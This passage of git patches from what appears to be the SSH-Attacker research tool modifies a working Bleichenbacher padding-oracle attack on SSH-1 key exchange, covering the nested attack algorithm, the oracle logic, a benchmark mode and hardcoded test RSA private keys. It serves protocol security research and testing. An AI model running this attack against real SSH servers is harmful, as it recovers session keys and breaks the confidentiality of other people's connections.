"9DEC042FBC290443B23E24C64765DE1AD58777A522BF102B1BCC5536D794" + + "62BCBE6DB8E91CD9CF6F98F62E5031BFAA9E51C93ED900579A39C26CBB64" + + "CF7E6F998513E20B4B2A4DD36D4F6F074A0FDB04232FA6EDAB89A1B32BA5" + + "2214696BDA66C4518A73F92807DD088AB11263519885A0CD6A42B6D9EAE9" + + "EBD13241EDC4EB7205AE838A5EF7AE280D36410057B38ED05CEBA75F92AC" + + "DF40226164BB3A0C4312B65A8C2FBA85CDB7CC5F77F53C45F64409AFC460" + + "210C8EE4DAB818F009172387ED00E141", + 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + + CustomRsaPublicKey hostPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + + CustomRsaPrivateKey serverPrivateKey = + new CustomRsaPrivateKey( + new BigInteger( + "64F3D28624C63EC5E0A9751FDC4B2D" + + "ADC715F0DDA9D49EF91B4C5AA03483" + + "570BA8AA01151B704335A3219E7D22" + + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" + + "99CF0334044E6ED09B40E754809429" + + "F6C387B7AC7BA00ECFE7AFE4D41499" + + "B2F341FBB0496C52CBE5EB1F7E64F4" + + "BF21F72B64EE0B478EAB6A0008E07A" + + "E2F52960703D0EB9", + 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + + CustomRsaPublicKey serverPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + */ + + /*// Host 1024 + CustomRsaPublicKey hostPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", + 16)); CustomRsaPrivateKey hostPrivatKey = new CustomRsaPrivateKey( new BigInteger( - "7AAB5898AEE7C451A2A90B9DE04EC947656FAB69460FF68E1E278EA1841D" - + "A22B39CA4A4FA7CEA1B8EDCB7224C38A1659D1226D2E07AF9A7C62A305AC" - + "9DEC042FBC290443B23E24C64765DE1AD58777A522BF102B1BCC5536D794" - + "62BCBE6DB8E91CD9CF6F98F62E5031BFAA9E51C93ED900579A39C26CBB64" - + "CF7E6F998513E20B4B2A4DD36D4F6F074A0FDB04232FA6EDAB89A1B32BA5" - + "2214696BDA66C4518A73F92807DD088AB11263519885A0CD6A42B6D9EAE9" - + "EBD13241EDC4EB7205AE838A5EF7AE280D36410057B38ED05CEBA75F92AC" - + "DF40226164BB3A0C4312B65A8C2FBA85CDB7CC5F77F53C45F64409AFC460" - + "210C8EE4DAB818F009172387ED00E141", + "0092FAA9AC0FB31CBA0CCE07C460D1" + + "8B5088A02C7E0E88E6E8A9FD2207CA" + + "ECAAF7150ABB31EBAAD84EA32C0AB7" + + "C27E5F1230CD878BCD9BE7047BE040" + + "3FD9B13624D9C822AB17C96615BB5A" + + "875D1A076D282B2E9035FAC37DB066" + + "82C8498BA624C77B0E1E2ECBE7AB5A" + + "5A0342E20C54482D149A7F37F8EF4A" + + "2C148CD3ADD6782189", 16), new BigInteger( - "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" - + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" - + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" - + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" - + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" - + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" - + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" - + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" - + "3F3EE64B04888B898864B08200A9E22909", + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", 16)); - CustomRsaPublicKey hostPublicKey = + // Server 768 Bit + CustomRsaPublicKey serverPublicKey = new CustomRsaPublicKey( new BigInteger("010001", 16), new BigInteger( - "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" - + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" - + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" - + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" - + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" - + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" - + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" - + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" - + "3F3EE64B04888B898864B08200A9E22909", + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", 16)); - CustomRsaPrivateKey serverPrivateKey = new CustomRsaPrivateKey( new BigInteger( - "64F3D28624C63EC5E0A9751FDC4B2D" - + "ADC715F0DDA9D49EF91B4C5AA03483" - + "570BA8AA01151B704335A3219E7D22" - + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" - + "99CF0334044E6ED09B40E754809429" - + "F6C387B7AC7BA00ECFE7AFE4D41499" - + "B2F341FBB0496C52CBE5EB1F7E64F4" - + "BF21F72B64EE0B478EAB6A0008E07A" - + "E2F52960703D0EB9", + "00B30F82CADCC13296E7FC5D420819" + + "49EDE560A99C68208906F48D4248A1" + + "00EFCE30D9A1398FED04619390D7D3" + + "9AE0ECB7DFB6A5EC8CA6A491097680" + + "9280CB64AF1F8C8B67739CF7093B34" + + "4343419647B331CD9827953279BE6C" + + "AC31C55BA6EF01", 16), new BigInteger( - "00C25E6978A2B8FE2C6228024BD5D0" - + "F3239DDDDECCDF156AEF9D3F7F56AF" - + "8443C510A03C66779363C33082D04D" - + "23648B308AE0BE07A1451C8BFF0B97" - + "DCA43E5703D66B8C04BF46DDBC79A7" - + "7228179E5B246433098BF8271CCE66" - + "C5E4CB3A9E2ECEE52BB07C33F92893" - + "A5D5B6F163BE6FBC1E8E66E4666866" - + "871890105EFFE1193F", - 16)); + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", + 16));*/ - CustomRsaPublicKey serverPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00C25E6978A2B8FE2C6228024BD5D0" - + "F3239DDDDECCDF156AEF9D3F7F56AF" - + "8443C510A03C66779363C33082D04D" - + "23648B308AE0BE07A1451C8BFF0B97" - + "DCA43E5703D66B8C04BF46DDBC79A7" - + "7228179E5B246433098BF8271CCE66" - + "C5E4CB3A9E2ECEE52BB07C33F92893" - + "A5D5B6F163BE6FBC1E8E66E4666866" - + "871890105EFFE1193F", - 16)); + byte[] encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); + if ((encryptedSecret.length * Byte.SIZE) != hostPublicKey.getModulus().bitLength()) { + throw new ConfigurationException( + "The length of the encrypted secret " + + "is not equal to the public key length. Have you selected the correct value?"); + } + + try { + Thread.sleep(500); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + // byte[] encryptedSecret = + // ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); try { - /* - Ssh1MockOracle oracle = - new Ssh1MockOracle( - hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); - */ + /* Ssh1MockOracle oracle = + new Ssh1MockOracle( + hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey);*/ BleichenbacherOracle oracle = new BleichenbacherOracle( @@ -290,9 +368,9 @@ public void executeAttack() { getSshConfig(), counterInnerBleichenbacher, counterOuterBleichenbacher); + Bleichenbacher attacker = - new Bleichenbacher( - encryptedSecret, oracle, this.hostPublicKey, this.serverPublicKey); + new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); long start = System.currentTimeMillis(); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 3efebd908..b4ad23650 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -458,9 +458,7 @@ private byte[] nestedBleichenbacher( BigInteger a = M.get(0).lower; BigInteger b = M.get(0).upper; if (a.equals(b)) { - byte[] result = new byte[innerK]; - byte[] aBytes = a.toByteArray(); - System.arraycopy(aBytes, 0, result, innerK - aBytes.length, aBytes.length); + byte[] result = a.toByteArray(); return result; } s = find_s_in_range_nested(a, b, s, ciphertext, innerPublicKey, outerPublicKey); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 5a24e3a9e..9493cf0f0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -32,6 +32,7 @@ import java.util.Objects; import java.util.Optional; import javax.crypto.BadPaddingException; +import javax.crypto.IllegalBlockSizeException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -80,7 +81,7 @@ public void adjustContext(ClientSessionKeyMessage message) { "chosen unsupported Encryption-Algorithm {}, fall back to NONE", chosenCipherMethod); } - LOGGER.info("Successfulle applied Encryption Algorihm {}", encryptionAlgorithm); + LOGGER.info("Successfully applied Encryption Algorithm {}", encryptionAlgorithm); // Set Server2Client and Client2Server identical because of SSH1 chooser.getContext() @@ -201,6 +202,7 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE AbstractCipher outerEncryption; boolean firstEncryptionSuccessfull = false; + boolean secondEncryptionSuccessfull = false; try { @@ -226,6 +228,8 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE innerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); sessionKey = innerEncryption.decrypt(sessionKey); + secondEncryptionSuccessfull = true; + } else { outerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); sessionKey = outerEncryption.decrypt(sessionKey); @@ -234,32 +238,39 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE innerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); sessionKey = innerEncryption.decrypt(sessionKey); + + secondEncryptionSuccessfull = true; } } catch (CryptoException e) { LOGGER.fatal(e); - if (e.getCause() instanceof BadPaddingException) { - if (firstEncryptionSuccessfull) { + if (e.getCause() instanceof BadPaddingException + || e.getCause() instanceof IllegalBlockSizeException) { + if (firstEncryptionSuccessfull && !secondEncryptionSuccessfull) { LOGGER.fatal("Caused by BadPadding in second encryption"); // SEND Disconnect Message // only the first one is correct, setting to 1 sshContext.setBbResult(1); - } else { + } else if (!firstEncryptionSuccessfull && !secondEncryptionSuccessfull) { LOGGER.fatal("Caused by BadPadding in first encryption"); // SEND Failure Message // no key is correct - setting to 0 sshContext.setBbResult(0); + } else if (firstEncryptionSuccessfull && secondEncryptionSuccessfull) { + LOGGER.fatal("Anything happend but both run successfull"); + sshContext.setBbResult(2); } - } else { - sshContext.setBbResult(2); } - // Both correct, setting BB Result to 2 - // throw new RuntimeException(e); // Set Session key to dummy value sessionKey = new byte[32]; } + if (firstEncryptionSuccessfull && secondEncryptionSuccessfull) { + LOGGER.info("no Error while decrypting -> both were successfull"); + sshContext.setBbResult(2); + } + // Set Sessionkey LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); From e133fa401d8379151e3effdbb02e0d48dbe34be7 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 6 Nov 2023 23:31:44 +0100 Subject: [PATCH 105/176] fixing logging and error messages --- .../rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java | 2 +- .../java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java | 2 +- .../java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java | 2 -- .../de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java | 2 +- .../nds/sshattacker/core/packet/cipher/PacketCipherFactory.java | 2 ++ 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java index fccc752e3..f5c446c85 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java @@ -55,7 +55,7 @@ public byte[] decrypt(byte[] encryptedData) throws CryptoException { prepareCipher(Cipher.DECRYPT_MODE); return cipher.doFinal(encryptedData); } catch (IllegalBlockSizeException e) { - LOGGER.fatal("Encryption-Error: {}", e.getMessage()); + LOGGER.fatal("Decryption-Error: {}", e.getMessage()); LOGGER.fatal(e); throw new CryptoException("Could not decrypt data with RSA/ECB/PKCS1Padding.", e); } catch (BadPaddingException e) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index ee53f1ea9..6a8a9724e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -162,7 +162,7 @@ public LayerProcessingResult receiveData() { LOGGER.debug("[bro] I was here"); } catch (IOException e) { // the lower layer does not give us any data so we can simply return here - LOGGER.warn("The lower layer did not produce a data stream: ", e); + LOGGER.debug("The lower layer did not produce a data stream: ", e); return getLayerResult(); } LOGGER.debug("[bro] Searching for Hint"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 16fc072ab..8bbb59c6e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -70,14 +70,12 @@ public HintedInputStream getDataStream() throws IOException { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); if (context.getContext().getSshContext().isReceiveAsciiModeEnabled()) { - LOGGER.info("Recive in ASCII-Mode"); byte[] receiveBuffer = new byte[0]; byte[] readByte; do { readByte = context.getTransportHandler().fetchData(1); receiveBuffer = ArrayConverter.concatenate(receiveBuffer, readByte); } while (readByte.length > 0 && readByte[0] != CharConstants.NEWLINE); - LOGGER.info("Ended after got a new line"); currentInputStream = new HintedInputStreamAdapterStream( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java index ca07e9ed5..7daba813d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java @@ -146,7 +146,7 @@ public void setCrcChecksum(byte[] crcChecksum) { @Override public void prepareComputations() { - LOGGER.info("[bro] Preparing Computation"); + LOGGER.debug("[bro] Preparing Computation"); if (computations == null) { computations = new PacketCryptoComputations(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java index cf5f4ac91..5e8a5f319 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java @@ -37,6 +37,8 @@ public static PacketCipher getPacketCipher( } else if (encryptionAlgorithm == EncryptionAlgorithm.TRIPLE_DES_CBC) { return new PacketSsh1Cipher( context, keySet, EncryptionAlgorithm.TRIPLE_DES_CBC, null, mode); + } else if (encryptionAlgorithm == EncryptionAlgorithm.NONE && macAlgorithm == null) { + return getNoneCipher(context, mode); } else { return new PacketMacedCipher( context, keySet, encryptionAlgorithm, macAlgorithm, mode); From 2094e830d386d67fcd5648ae0017e96b642d4491 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 9 Nov 2023 22:30:47 +0100 Subject: [PATCH 106/176] Fixing Logging for better "INFO"-Logs and reducing Logoutput --- .../nds/sshattacker/attacks/pkcs1/Bleichenbacher.java | 10 +++++----- .../attacks/pkcs1/oracles/BleichenbacherOracle.java | 2 +- .../de/rub/nds/sshattacker/server/main/SshServer.java | 1 + 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index b4ad23650..e9daa0760 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -102,7 +102,7 @@ private BigInteger find_smallest_s( BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); try { - Thread.sleep(100); + Thread.sleep(0); } catch (InterruptedException e) { throw new RuntimeException(e); } @@ -364,16 +364,16 @@ public void attack() { if (hostPublicKey.getModulus().bitLength() > serverPublicKey.getModulus().bitLength()) { byte[] cracked = nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); - LOGGER.debug("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); + LOGGER.info("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); byte[] cracked_decoded = pkcs1Decode(cracked); - LOGGER.debug("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); + LOGGER.info("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); solution = new BigInteger(cracked_decoded); } else { byte[] cracked = nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); - LOGGER.debug("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); + LOGGER.info("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); byte[] cracked_decoded = pkcs1Decode(cracked); - LOGGER.debug("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); + LOGGER.info("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); solution = new BigInteger(cracked_decoded); } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index 4c9e23169..49454b042 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -120,7 +120,7 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { LOGGER.debug("Received Failure Message -> the first one was correct :|"); conform[0] = true; } else if (lastMessage instanceof SuccessMessageSSH1) { - LOGGER.debug("Received Failure Message -> both were correct :)"); + LOGGER.info("Received Success Message -> both were correct :)"); conform[0] = true; conform[1] = true; } else { diff --git a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java index e0fcaa309..b2890a034 100644 --- a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java +++ b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java @@ -39,6 +39,7 @@ public static void main(String[] args) { try { SshServer server = new SshServer(); + LOGGER.info("Starting Server now... "); server.startSshServer(sshConfig); } catch (Exception e) { LOGGER.error( From fd51364ab73a20808ccb5dd210d5841b62ce9ff8 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 9 Nov 2023 22:31:14 +0100 Subject: [PATCH 107/176] Adding "Benchmark"-Mode for simpler benchmarking --- .../config/BleichenbacherCommandConfig.java | 14 +++++ .../attacks/impl/BleichenbacherAttacker.java | 61 ++++++++++++++++++- 2 files changed, 74 insertions(+), 1 deletion(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index 0597d6598..01da78c20 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -45,6 +45,12 @@ public class BleichenbacherCommandConfig extends AttackConfig { + " secret message, right click on the \"Encrypted Secret\" value and copy this value as a Hex Stream.") private String encryptedSecret; + @Parameter( + names = {"-benchmark", "-b"}, + description = + "If this value is set the Attack is Benchmarked, all Encrypted-Secrets are randomly generated") + private boolean benchmark = false; + /** How many rescans should be done */ private int numberOfIterations = 3; @@ -105,4 +111,12 @@ public int getNumberOfIterations() { public void setNumberOfIterations(int mapListDepth) { this.numberOfIterations = mapListDepth; } + + public boolean isBenchmark() { + return benchmark; + } + + public void setBenchmark(boolean benchmark) { + this.benchmark = benchmark; + } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 171d37ecc..f75caffcf 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -19,13 +19,20 @@ import de.rub.nds.sshattacker.attacks.response.EqualityError; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; +import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; +import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import java.io.FileNotFoundException; +import java.io.FileOutputStream; +import java.io.IOException; import java.math.BigInteger; import java.security.interfaces.RSAPublicKey; import java.util.ArrayList; import java.util.Collections; import java.util.List; +import java.util.Random; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -176,6 +183,10 @@ public void executeAttack() { // --UnComment FOR "NORMAL" NOES getPublicKeys(); getHostPublicKey(); + Random random = new Random(); + byte[] sessionKey = new byte[32]; + random.nextBytes(sessionKey); + getServerPublicKey(); LOGGER.info( String.format( @@ -340,8 +351,29 @@ public void executeAttack() { + "ACE6CD53C051E26E69AF472D0CFE17" + "322EC96499E529", 16));*/ + byte[] encryptedSecret; + if (config.isBenchmark()) { + LOGGER.info("Running in Benchmark Mode, generating encrypted Session Key"); + AbstractCipher innerEncryption; + AbstractCipher outerEncryption; + if (hostPublicKey.getModulus().bitLength() < serverPublicKey.getModulus().bitLength()) { + innerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPublicKey); + outerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPublicKey); + } else { + innerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPublicKey); + outerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPublicKey); + } + + try { + sessionKey = innerEncryption.encrypt(sessionKey); + encryptedSecret = outerEncryption.encrypt(sessionKey); + } catch (CryptoException e) { + throw new RuntimeException(e); + } + } else { + encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); + } - byte[] encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); if ((encryptedSecret.length * Byte.SIZE) != hostPublicKey.getModulus().bitLength()) { throw new ConfigurationException( "The length of the encrypted secret " @@ -392,6 +424,33 @@ public void executeAttack() { / Byte.SIZE);*/ CONSOLE.info("Encoded Solution: " + solution); + + byte[] array = solution.toByteArray(); + if (array[0] == 0) { + byte[] tmp = new byte[array.length - 1]; + System.arraycopy(array, 1, tmp, 0, tmp.length); + array = tmp; + } + + try { + String str = + String.format( + "Results: Plaintext: %s; Time: %d ms; Inner-Tries: %d; Outer-Tries: %d", + ArrayConverter.bytesToHexString(array), + timeElapsed, + attacker.getCounterInnerBleichenbacher(), + attacker.getCounterOuterBleichenbacher()); + FileOutputStream outputStream = new FileOutputStream("benchmark_result.output"); + byte[] strToBytes = str.getBytes(); + outputStream.write(strToBytes); + + outputStream.close(); + } catch (FileNotFoundException e) { + throw new RuntimeException(e); + } catch (IOException e) { + throw new RuntimeException(e); + } + // CONSOLE.info("Decoded Secret: " + secret); } /*catch (NoSuchPaddingException e) { throw new RuntimeException(e); From a77b696075e5ab0753d62057d2c4fd84cd82656e Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 10 Nov 2023 22:54:33 +0100 Subject: [PATCH 108/176] adding simple benchmark-output to file for easier obersvation --- .../attacks/impl/BleichenbacherAttacker.java | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java 